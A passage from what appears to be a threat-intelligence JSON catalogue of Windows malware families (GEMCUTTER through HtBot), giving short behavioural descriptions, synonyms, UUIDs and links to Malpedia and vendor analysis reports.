"5e699f4d-9ff6-49dd-bc04-797f0ab2e128", "value": "GearInformer" }, { "description": "According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key.\r\nGEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn't exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "e46ae329-a619-4cfc-8059-af326c11ee79", "value": "GEMCUTTER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", "value": "GetMail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware" ], "synonyms": [ "getmypos" ], "type": [] }, "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", "value": "GetMyPass" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf" ], "synonyms": [ "CoreImpact (Modified)", "Gholee" ], "type": [] }, "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", "value": "Ghole" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", "https://en.wikipedia.org/wiki/GhostNet", "https://www.nartv.org/2019/03/28/10-years-since-ghostnet/", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html" ], "synonyms": [ "Remosh" ], "type": [] }, "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", "value": "Gh0stnet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin", "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" ], "synonyms": [ "Ghost iBot" ], "type": [] }, "uuid": "6201c337-1599-4ced-be9e-651a624c20be", "value": "GhostAdmin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", "http://www.malware-traffic-analysis.net/2018/01/04/index.html", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", "http://www.hexblog.com/?p=1248", "https://blog.cylance.com/the-ghost-dragon", "https://www.intezer.com/blog-chinaz-relations/" ], "synonyms": [ "Gh0st RAT", "PCRat" ], "type": [] }, "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", "value": "Ghost RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses", "https://forum.exploit.in/pda/index.php/t102378.html" ], "synonyms": [ "Wordpress Bruteforcer" ], "type": [] }, "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", "value": "Glasses" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat", "https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" ], "synonyms": [], "type": [] }, "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", "value": "GlassRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos", "https://blog.talosintelligence.com/2019/03/glitchpos-new-pos-malware-for-sale.html" ], "synonyms": [], "type": [] }, "uuid": "d2e0cbfb-c647-48ec-84e2-ca2199cf7d03", "value": "GlitchPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", "https://isc.sans.edu/diary/23417", "https://blog.ensilo.com/globeimposter-ransomware-technical", "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet" ], "synonyms": [], "type": [] }, "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", "value": "GlobeImposter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom" ], "synonyms": [], "type": [] }, "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", "value": "Globe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", "value": "GlooxMail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", "http://resources.infosecinstitute.com/tdss4-part-1/", "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/" ], "synonyms": [], "type": [] }, "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", "value": "Glupteba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" ], "synonyms": [], "type": [] }, "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", "value": "Godzilla Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", "value": "Goggles" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html" ], "synonyms": [ "Petya/Mischa" ], "type": [] }, "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", "value": "GoldenEye" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" ], "synonyms": [], "type": [] }, "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", "value": "GoldDragon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" ], "synonyms": [], "type": [] }, "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", "value": "Golroted" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" ], "synonyms": [ "Fuerboos" ], "type": [] }, "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", "value": "Goodor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat", "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" ], "synonyms": [], "type": [] }, "uuid": "d1298818-6425-49be-9764-9f119d964efd", "value": "GoogleDrive RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic", "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" ], "synonyms": [], "type": [] }, "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", "value": "GooPic Drooper" }, { "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055", "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", "https://www.us-cert.gov/ncas/alerts/TA16-336A", "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", "https://www.youtube.com/watch?v=242Tn0IL2jE", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669", "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", "https://news.drweb.com/show/?i=4338&lng=en", "https://www.youtube.com/watch?v=QgUlPvEE4aw", "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/" ], "synonyms": [ "Xswkit", "talalpek" ], "type": [] }, "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", "value": "GootKit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat", "https://www.yumpu.com/en/document/view/55930175/govrat-v20" ], "synonyms": [], "type": [] }, "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", "value": "GovRAT" }, { "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", "https://www.secureworks.com/research/gozi", "https://lokalhost.pl/gozi_tree.txt", "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/" ], "synonyms": [ "CRM", "Gozi CRM", "Papras", "Snifula", "Ursnif" ], "type": [] }, "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", "value": "Gozi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/", "https://de.securelist.com/analysis/59479/erpresser/", "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2" ], "synonyms": [], "type": [] }, "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", "value": "GPCode" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot", "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" ], "synonyms": [], "type": [] }, "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", "value": "GrabBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" ], "synonyms": [], "type": [] }, "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", "value": "Graftor" }, { "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" ], "synonyms": [ "FrameworkPOS", "trinity" ], "type": [] }, "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", "value": "Grateful POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" ], "synonyms": [], "type": [] }, "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", "value": "Gratem" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" ], "synonyms": [], "type": [] }, "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", "value": "Gravity RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease", "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" ], "synonyms": [], "type": [] }, "uuid": "4ed079e6-69bd-481b-b873-86ced9ded750", "value": "GREASE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan", "https://blog.cylance.com/spear-a-threat-actor-resurfaces" ], "synonyms": [ "eoehttp" ], "type": [] }, "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", "value": "GreenShaitan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy", "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/", "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", "https://www.eset.com/int/greyenergy-exposed/", "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", "https://github.com/NozomiNetworks/greyenergy-unpacker" ], "synonyms": [], "type": [] }, "uuid": "5a683d4f-31a1-423e-a136-d348910ca967", "value": "GreyEnergy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" ], "synonyms": [], "type": [] }, "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", "value": "GROK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump", "https://attack.mitre.org/wiki/Technique/T1003" ], "synonyms": [], "type": [] }, "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", "value": "gsecdump" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1", "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" ], "synonyms": [], "type": [] }, "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", "value": "H1N1 Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", "value": "Hacksfase" }, { "description": "Py2Exe based tool as found on github.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy", "https://github.com/ratty3697/HackSpy-Trojan-Exploit" ], "synonyms": [], "type": [] }, "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", "value": "HackSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" ], "synonyms": [], "type": [] }, "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", "value": "Hamweq" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", "https://www.uperesia.com/hancitor-packer-demystified", "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", "https://boozallenmts.com/resources/news/closer-look-hancitor", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/" ], "synonyms": [ "Chanitor" ], "type": [] }, "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", "value": "Hancitor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker" ], "synonyms": [], "type": [] }, "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", "value": "HappyLocker (HiddenTear?)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig", "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" ], "synonyms": [ "Piptea" ], "type": [] }, "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", "value": "Harnig" }, { "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", "https://www.f-secure.com/weblog/archives/00002718.html" ], "synonyms": [], "type": [] }, "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", "value": "Havex RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/", "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/" ], "synonyms": [ "HawkEye Reborn", "Predator Pain" ], "type": [] }, "uuid": "31615066-dbff-4134-b467-d97a337b408b", "value": "HawkEye Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", "value": "Helauto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" ], "synonyms": [], "type": [] }, "uuid": "19d89300-ff97-4281-ac42-76542e744092", "value": "Helminth" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" ], "synonyms": [], "type": [] }, "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625", "value": "Heloag" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst", "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" ], "synonyms": [], "type": [] }, "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", "value": "Herbst" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html" ], "synonyms": [], "type": [] }, "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", "value": "Heriplor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [], "type": [] }, "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", "value": "Hermes" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", "https://blog.dcso.de/enterprise-malware-as-a-service/", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [], "type": [] }, "uuid": "4d8da0af-cfd7-4990-b211-af0e9906eca0", "value": "Hermes Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" ], "synonyms": [], "type": [] }, "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", "value": "HerpesBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" ], "synonyms": [], "type": [] }, "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", "value": "HesperBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", "https://twitter.com/struppigel/status/950787783353884672", "https://github.com/goliate/hidden-tear" ], "synonyms": [], "type": [] }, "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", "value": "HiddenTear" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" ], "synonyms": [], "type": [] }, "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", "value": "HideDRV" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", "https://www.recordedfuture.com/hidden-lynx-analysis/", "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" ], "synonyms": [], "type": [] }, "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", "value": "HiKit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan", "https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf" ], "synonyms": [], "type": [] }, "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", "value": "himan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat", "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" ], "synonyms": [], "type": [] }, "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", "value": "Hi-Zor RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" ], "synonyms": [], "type": [] }, "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", "value": "HLUX" }, { "description": " a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" ], "synonyms": [], "type": [] }, "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", "value": "homefry" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight", "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A", "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea" ], "synonyms": [], "type": [] }, "uuid": "3e489132-8687-46b3-b9a7-74ba8fafaddf", "value": "HOPLIGHT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" ], "synonyms": [], "type": [] }, "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", "value": "HtBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat", 